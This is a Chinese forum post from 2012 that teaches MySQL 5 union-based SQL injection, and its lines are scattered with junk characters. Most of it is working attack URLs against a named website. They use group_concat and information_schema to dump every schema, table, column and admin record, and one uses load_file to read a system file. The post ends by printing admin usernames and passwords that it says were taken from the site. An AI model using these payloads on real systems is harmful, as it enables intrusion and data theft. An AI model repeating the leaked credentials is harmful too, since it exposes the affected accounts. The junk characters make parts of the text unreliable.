此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似- Q/ w9 e! A% v" E8 z5 S
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人) H- z/ a9 P( H4 r
' d4 C0 t Y" ^* o0 Q1 H
' d8 ^8 q: G' c
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
! X$ w- S o- A z b0 g
! m+ k- ~3 i ~( l: f- [缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
: r0 M( v8 W& U+ `& `) i2 m# _7 u- A4 G' }% s" k
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
0 b. A ~% E! G6 S" _在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
% ^- ?. V4 k7 i) W' c! c, t0 b; D2 k( F( |4 ?* j; d7 @' D
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
' \. P2 S$ S1 \ `% H. @1 Y9 r8 S* J& Z7 [
读出所有库:4 L I! V( a+ h# Q0 J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
v* q) G8 g$ m! R! n
: j$ S( y! E6 O6 V0 P
6 i$ n% \& N- j! b3 g" ?9 U: \3 a
读出所有表:) e8 ]2 G% ?- ^" K" V. U- w2 E N
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()8 Y1 `0 ?* t6 i. L9 K4 Y
( q; ~% G8 W' F读出所有表字段:. j: [8 f) Q6 m; w, K+ P9 {
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
1 F; f2 F0 Y8 ~: V# h8 f/ F*/ (97,100,109,105,110)为admin的ascii码 依次类推7 |8 g5 Q& a7 e) ?7 ]) |( m
+ U' f! S3 T6 ~: b
读出所有表字段里的内容:0 Z% c8 C9 b- h. i# B) m
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin: `& m, h2 ^# Y* A
/ n3 ] C8 R y% Y* f4 ]0 V/ C, Q$ o( i: L" t: V
) ~/ a, d( k7 K o2 T/ P4 @
) [& b* H* [' I
; L" T9 J# ]) l; y! `, h+ E j6 {. F9 E* D* }- A, V
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
* ]- s( v# U& B$ C+ k, h
( f% ?# W) f& Q3 K! y3 |/ D! D9 x4 c u( s* |5 U$ J
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
; o9 N+ @3 E' x: V
; \$ f u' e- r; `http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23# W# `1 z- ~+ T- I
& A: V' j" ?( R- H% g3 h$ _1 ]' q' w- t5 u1 d2 e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23( ]# s [. {0 j: {1 p
/ M j i! Z8 f& h/ R2 T# J( N) T
. D, M. d6 z0 s8 S( [- a+ l webmaster:dzb521123,simlab:simadmin20043233. }* q' [" k/ C0 p8 @. _
|
发表于 2012-9-13 16:37:34
收藏
支持
反对